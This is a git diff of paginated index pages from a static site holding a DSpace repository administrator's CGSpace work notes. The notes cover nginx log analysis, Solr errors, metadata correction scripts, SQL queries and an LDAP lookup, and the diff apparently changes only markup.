a/docs/page/2/index.html +++ b/docs/page/2/index.html @@ -10,14 +10,14 @@ - + - + @@ -221,17 +221,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                              • I had a call with CodeObia to discuss the work on OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                              • Check the results of the AReS harvesting from last night:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                                                                                                                                                              -  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                              +{
                                                                                                                                                                                                                                                                                                                                                                                                                              +  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                              +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                              +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                              +  }
                                                                                                                                                                                                                                                                                                                                                                                                                              +}
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → diff --git a/docs/page/3/index.html b/docs/page/3/index.html index 1b00b1891..b3988b8d9 100644 --- a/docs/page/3/index.html +++ b/docs/page/3/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/page/4/index.html b/docs/page/4/index.html index 958fc43d2..c6ffcaae3 100644 --- a/docs/page/4/index.html +++ b/docs/page/4/index.html @@ -10,14 +10,14 @@ - + - + @@ -113,17 +113,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           4671942
                                                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           1277694
                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                          • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                                                          • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                           1183456 
                                                                                                                                                                                                                                                                                                                                                                                                                          -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                           106781
                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -143,7 +143,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                          - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. Read more → @@ -166,7 +166,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                        • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                                                        • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                             440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                                                             441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                                                             485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -177,7 +177,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                             814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                                                            2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                                                            6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                                                        -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                        +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                              33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                                              57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                                              57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -338,16 +338,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                        4432 200
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                    • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                                                    • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                    Read more → @@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                                                  • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                       245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                                                       332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                                                       385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                                                • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                 3018243
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/page/5/index.html b/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                index 68a22b563..e9e7b1766 100644
                                                                                                                                                                                                                                                                                                                                                                                                                --- a/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                +++ b/docs/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                @@ -110,7 +110,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                              • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                                              • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                    92 40.77.167.4
                                                                                                                                                                                                                                                                                                                                                                                                                    99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                                                   120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                                              @@ -308,7 +308,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                            • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                                                            • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                                                            • Time to index ~70,000 items on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                            • diff --git a/docs/page/6/index.html b/docs/page/6/index.html index 61c5d3e45..cb9382cf4 100644 --- a/docs/page/6/index.html +++ b/docs/page/6/index.html @@ -10,14 +10,14 @@ - + - + @@ -166,11 +166,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                            • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                                                            2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                                                            -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                            +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-23:4
                                                                                                                                                                                                                                                                                                                                                                                                            @@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                             0
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                             COPY 54701
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            Read more → diff --git a/docs/page/7/index.html b/docs/page/7/index.html index 167c0b15e..1eaf3c910 100644 --- a/docs/page/7/index.html +++ b/docs/page/7/index.html @@ -10,14 +10,14 @@ - + - + @@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                          • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                                                          • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -210,7 +210,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                          • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                                                             id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                                                           -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                                                            92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                                                          @@ -268,11 +268,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                        • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                                                        • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                        • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                                                        • I’ve raised a ticket with Atmire to ask
                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -354,7 +354,7 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                        • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                                                        • It looks like we might be able to use OUs now, instead of DCs:
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                        Read more → diff --git a/docs/page/8/index.html b/docs/page/8/index.html index 230f4ed35..20240233c 100644 --- a/docs/page/8/index.html +++ b/docs/page/8/index.html @@ -10,14 +10,14 @@ - + - + @@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                                                                      • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                                                                      • I think this query should find and replace all authors that have “,” at the end of their names:
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                       UPDATE 95
                                                                                                                                                                                                                                                                                                                                                                                                      -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                      +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                        text_value
                                                                                                                                                                                                                                                                                                                                                                                                       ------------
                                                                                                                                                                                                                                                                                                                                                                                                       (0 rows)
                                                                                                                                                                                                                                                                                                                                                                                                      @@ -198,7 +198,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                    • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                                                                    • There are 3,000 IPs accessing the REST API in a 24-hour period!
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                    +
